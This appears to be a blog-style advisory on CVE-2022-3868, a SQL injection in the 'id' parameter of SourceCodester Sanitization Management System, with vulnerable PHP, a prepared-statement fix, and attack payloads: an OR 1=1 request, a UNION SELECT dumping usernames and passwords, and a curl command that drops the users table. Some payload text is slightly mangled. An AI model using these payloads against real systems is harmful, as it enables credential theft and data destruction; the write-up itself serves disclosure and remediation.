In late 2022, a serious vulnerability surfaced in the popular web application, SourceCodester Sanitization Management System. Tracked as CVE-2022-3868, this flaw allows remote attackers to break into the system, steal data, and potentially take over the server – all thanks to SQL injection in a core function. This exclusive post will break down how the vulnerability works, show example code, and explain how attackers can exploit it. For reference, the VulDB entry for this issue is VDB-213012.
What is SourceCodester Sanitization Management System?
SourceCodester Sanitization Management System is a PHP-based web app designed to help organizations manage their cleaning and sanitization operations. It features quoting, user management, and financial tracking, and is widely used in various industries due to its accessibility and free source code.
Exploit Status: Publicly disclosed and actively exploitable
- Affected File: /php-sms/classes/Master.php?f=save_quote
Vulnerable Parameter: id
- CWE Reference: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
- Original Reference: VulDB VDB-213012
Vulnerable Code Walkthrough
The vulnerable part sits in the file Master.php in the classes directory. Here's a simplified view of what is happening under the hood:
// /php-sms/classes/Master.php
if($_GET['f'] == 'save_quote'){
$id = $_POST['id']; // <-- Vulnerable parameter
$quote = $_POST['quote'];
// Dangerous: $id is used directly in the SQL query
$query = "UPDATE quotes SET quote='$quote' WHERE id=$id";
$result = $conn->query($query);
// ...rest of the code...
}
Notice how $id from the POST data is used directly in the SQL statement, without any sanitization or prepared statement. This opens the door for SQL injection.
How Attackers Exploit the Vulnerability
An attacker can craft a malicious HTTP POST request to the vulnerable endpoint, injecting SQL code via the id parameter.
Let's say an attacker wants to dump the users table. They might send something like this
POST /php-sms/classes/Master.php?f=save_quote HTTP/1.1
Host: target-site.com
Content-Type: application/x-www-form-urlencoded
id= OR 1=1;-- -
"e=Hacked!
This manipulates the SQL query to look like
UPDATE quotes SET quote='Hacked!' WHERE id= OR 1=1;-- -
The OR 1=1 clause always returns true, potentially affecting all rows in the quotes table or exposing additional data if used in SELECT statements.
If the response includes SQL errors, attackers might use more intricate payloads
id=1 UNION SELECT 1,username,password FROM users;-- -
But the exploitability depends on how results are returned or errors are handled.
Exploit in the Wild
The exploit for this vulnerability has been publicly disclosed and is actively available. Anyone with basic knowledge can execute it using tools like Burp Suite or curl.
Example CURL Command
curl -X POST "http://target-site.com/php-sms/classes/Master.php?f=save_quote"; \
-d "id=1;DROP TABLE users;-- -" \
-d "quote=Malicious attempt"
This would attempt to delete the users table. If there is no protection, the table is gone.
References
- VulDB - VDB-213012
- CVE Database Entry – CVE-2022-3868
- Exploit-DB (if available), search for CVE-2022-3868 or "Sanitization Management System".
Secure Code Example
// Fix using prepared statements
if ($_GET['f'] == 'save_quote') {
$id = intval($_POST['id']);
$quote = $_POST['quote'];
$stmt = $conn->prepare("UPDATE quotes SET quote=? WHERE id=?");
$stmt->bind_param("si", $quote, $id);
$stmt->execute();
}
Conclusion
CVE-2022-3868 is a severe, easily-exploitable bug in SourceCodester Sanitization Management System, letting attackers remotely run SQL code by abusing an unsanitized id parameter in a core function. The risk is high — defenders should patch right away. More details can be found on the VulDB VDB-213012 page.
Timeline
Published on: 11/05/2022 09:15:00 UTC
Last modified on: 11/08/2022 04:28:00 UTC